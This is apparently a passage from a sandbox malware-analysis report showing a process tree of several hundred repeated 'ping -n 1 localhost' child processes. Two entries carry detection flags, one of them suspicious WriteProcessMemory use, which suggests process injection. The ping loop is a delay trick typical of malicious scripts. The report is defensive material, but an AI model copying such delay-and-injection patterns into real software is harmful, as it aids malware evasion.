  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4204
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:520
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4296
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2856
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5068
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1812
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:832
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2640
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3816
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5116
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4832
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:856
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4828
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4612
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4416
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3044
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1008
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2940
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3400
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1272
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2200
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4628
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4484
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1916
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3908
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3680
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3700
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4384
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5028
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1372
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4008
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1440
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4888
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4244
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1304
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4572
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1032
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:716
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4204
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3864
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3640
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1988
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2024
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5092
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5040
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1288
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1448
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1268
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4024
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4652
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2304
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2408
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2276
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:804
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3084
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1028
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:424
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1928
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1924
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2140
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4684
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3560
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1516
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2864
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3496
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3632
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2132
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3764
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3684
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2696
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1956
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1336
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1684
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2652
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4712
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3812
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2848
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2232
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4400
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1996
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4524
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2756
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4388
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4908
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3480
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4592
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:780
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5052
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3920
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4356
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4408
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4692
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1816
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4076
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2724
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3808
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4944
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1768
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1796
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3240
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4336
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1352
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:520
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4296
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1592
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3604
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5084
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1316
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3960
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1168
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3372
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4680
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4440
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:856
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4828
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4416
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1212
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3964
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2232
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4400
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5008
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2264
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4388
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4908
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2536
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:780
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3736
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4600
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2972
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4024
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1808
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2408
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2276
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4216
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1304
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1184
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:716
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1524
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3640
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1988
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4608
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:544
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1328
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4396
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3924
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3688
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1336
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:948
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2368
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3720
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3124
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2908
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1312
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1796
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1444
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4272
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4596
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:520
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1592
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3604
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5084
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:800
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1812
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4852
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5024
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1696
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4680
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4440
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5104
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4828
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:944
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1160
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2848
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4400
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4960
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5008
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2756
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3748
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4908
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:800
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1316
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4852
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3960
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2892
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1696
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3372
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1832
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4440
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4828
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:220
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4416
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1212
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4712
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3964
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5020
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2232
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1492
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:940
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5008
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2264
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2220
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3748
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4908
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2536
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4208
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:832
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4868
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5024
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1168
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2480
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1832
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4440
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:856
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4432
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4828
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:220
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:944
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1160
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4712
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2232
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5004
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2200
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1860
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:560
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2196
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3088
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3736
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1804
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3816
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4408
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4652
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2304
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3332
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4772
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4216
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3048
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1184
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1672
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4848
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1192
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4876
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1904
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1880
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1992
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:352
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3184
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1116
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:716
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:924
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1032
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3260
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:264
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4572
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4880
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1304
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2024
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3496
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3580
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2080
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2912
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2132
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3632
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5072
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3224
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4448
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4912
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:544
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4116
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4244
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4888
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2792
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2276
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:432
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2408
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4824
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1808
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1500
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4392
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4624
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4024
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1532
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1320
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4968
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4356
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2972
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2640
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4600
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2596
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3920
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:768
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5052
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1468
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:780
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1916
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2544
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2176
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3980
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3316
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      Runs ping.exe
      PID:4368
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4484
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4932
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4628
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3960
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1168
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3372
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1832
